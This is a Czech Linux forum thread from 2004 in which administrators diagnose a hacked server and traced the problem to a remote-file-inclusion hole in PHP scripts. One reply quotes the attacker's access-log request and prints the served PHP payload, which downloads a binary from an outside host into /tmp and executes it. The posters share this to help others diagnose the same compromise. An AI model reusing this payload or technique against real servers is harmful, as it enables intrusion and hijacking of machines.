Portál AbcLinuxu, 23. dubna 2024 09:50


Dotaz: DDos utok

25.8.2004 22:46 Mexiko | skóre: 25 | Chrudim
DDos utok
Přečteno: 271×
Odpovědět | Admin
ahoj lidi, nevím jestli to souvisí se zveřejněnými zprávami o připravovaném elektronickém džihádu, ale dneska jsem na domacím kompu měl najednou obrovský příchozí traffic ( a to zrovna, když se na mne přes známého obrátil jeden človíček, že jim zahakovali server a jejich admin je na dovolené - byl tam RedHat 9 a nepatchované jádro 2.4.20-8)

Trochu jsem ten provoz analyzoval a byl především z domén telecom.cz, chello.sk, vutbr.cz a hlavne extranetplus.cz - čili skoro všechno od poskytovatelů internetu nebo z vysokoskolských koleji. Tenhle provoz sice neprocházel přes firewall, ale docela zahlcoval linku.

Máte někdo nějaký podobný poznatek, nebo to bylo něco vyjímečného. A co vám říká DSADAS ???? To byl proces, ktery se najednou objevil na tom napadenym serveru a pravidelně se pod httpd spouštělo sh -c /tmp/dsadas;rm -f /tmp/dsadas a žralo to 99% výkonu procesoru. A v TOP-u byl proces 'EXE' a kupa procesu 'supervise' - to si taky nějak nepamatuju, že bych to kdy viděl
Nástroje: Začni sledovat (0) ?Zašle upozornění na váš email při vložení nového komentáře.

Odpovědi

13.9.2004 13:31 radim uchac
Rozbalit Rozbalit vše Re: DDos utok
Odpovědět | | Sbalit | Link | Blokovat | Admin
spise viz. http://www.mail-archive.com/debian-security@lists.debian.org/msg13628.html
13.9.2004 14:19 radim uchac
Rozbalit Rozbalit vše Re: DDos utok
Odpovědět | | Sbalit | Link | Blokovat | Admin
Podivejte tohle jsem nasel v logach :-))

access.log:142.176.141.5 - - [12/Sep/2004:09:19:28 +0200] "GET /index.php?id=http://142.176.141.5:113/ HTTP/1.1" 200 1834
a tohle jsem zkusil:
-bash-2.05b# telnet 142.176.141.5 113
Trying 142.176.141.5...
Connected to 142.176.141.5.
Escape character is '^]'.
GET /

HTTP/1.1 200 OK
Date: Tue, 22 Jun 2004 22:23:39 GMT
Server: Apache
Last-Modified: Thu, 13 May 2004 17:24:53 GMT
Accept-Ranges: bytes
Content-Length: 314
Connection: close
Content-Type: text/plain

< ? passthru("killall -9 exe dsadas /tmp/dsadas"); \
@unlink("/tmp/dsadas"); $fd = fopen("/tmp/dsadas", "w"); \
if(!$fd) exit; $xx = fopen('http://142.176.141.5/tmp', 'rb');\
 while($x=fread($xx, 10240)) fwrite($fd, $x); fclose($xx);\
fclose($fd); chmod("/tmp/dsadas", 0700); \
passthru("/tmp/dsadas;rm -f /tmp/dsadas"); ? >
Connection closed by foreign host.
-bash-2.05b# 
tedy jedna se o to ze uzivatele maji blbe napsane php scripty :-((

snad to nekomu pomuze
1.11.2004 19:06 Ondra Medek
Rozbalit Rozbalit vše Re: DDos utok
Dik, pomohlo to. Mam stejny problem.

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.